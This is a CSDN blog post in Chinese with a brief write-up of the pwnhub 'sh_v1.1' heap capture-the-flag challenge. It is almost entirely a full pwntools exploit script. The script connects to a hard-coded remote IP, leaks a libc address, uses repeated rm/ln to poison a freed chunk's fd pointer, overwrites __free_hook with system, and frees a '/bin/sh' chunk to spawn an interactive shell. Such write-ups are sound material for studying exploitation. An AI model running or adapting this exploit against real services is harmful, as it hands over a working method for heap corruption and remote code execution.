pwnhub sh_v1_1-CSDN博客

本文链接：https://blog.csdn.net/zzq487782568/article/details/129523994

pwnhub sh_v1_1

在这里插入图片描述
这题笔者操作了一会莫名其妙的就发现可以改fd了
操作过程在上面
rm 0，然后ln之后再rm 0再ln 过去的直接就可以改fd了，坑点就是远程libc是2.31的9版本，本地用的9.9打不通

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './sh_v1.1'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('121.40.89.206', 34883)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    raw_input()

menu = '>>>>'

def touch(name, content):
    r.sendlineafter(menu, 'touch ' + str(name))
    r.sendline(content)

def rm(name):
    r.sendlineafter(menu, 'rm ' + str(name))

def cat(name):
    r.sendlineafter(menu, 'cat ' + str(name))

def edit(name, content):
    r.sendlineafter(menu, 'gedit ' + str(name))
    r.sendline(content)

def cp(name, name2):
    r.sendlineafter(menu, 'cp ' + str(name) + ' ' + str(name2))

def ln(name, name2):
    r.sendlineafter(menu, 'ln ' + str(name) + ' ' + str(name2))

dbgg()

for i in range(10):
    touch(i, 'a' * 8)

for i in range(9):
    rm(i)

for i in range(7):
    touch(i, 'a' * 8)

touch(7, 'a' * 8)

cat(7)

leak_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('leak_addr = ' + hex(leak_addr))

#malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 1104 - 0x10
malloc_hook = leak_addr - 1104 - 0x10
li('malloc_hook = ' + hex(malloc_hook))

#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
li('libc_base = ' + hex(libc_base))


free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
#one = [0xe3afe, 0xe3b01, 0xe3b04]
one = [0x51e09, 0x51e15, 0x51e2a, 0x84143, 0x84150, 0x8415c, 0x84169, 0xe3afe, 0xe3b01, 0xe3b04, 0xe3cf3, 0xe3cf6, 0xe3d69, 0xe3d70, 0xe3db5, 0xe3dbd, 0x1075aa, 0x1075b2, 0x1075b7, 0x1075c1]
one_gadget = one[2] + libc_base
system_addr = libc_base + libc.sym['system']
edit(6, 'b' * 0x208)

rm(0)

ln(6, 0)

rm(0)
ln(6, 0)

edit(0, p64(free_hook))

touch(10, '/bin/sh\x00')
touch(11, p64(system_addr))

rm(10)

r.interactive()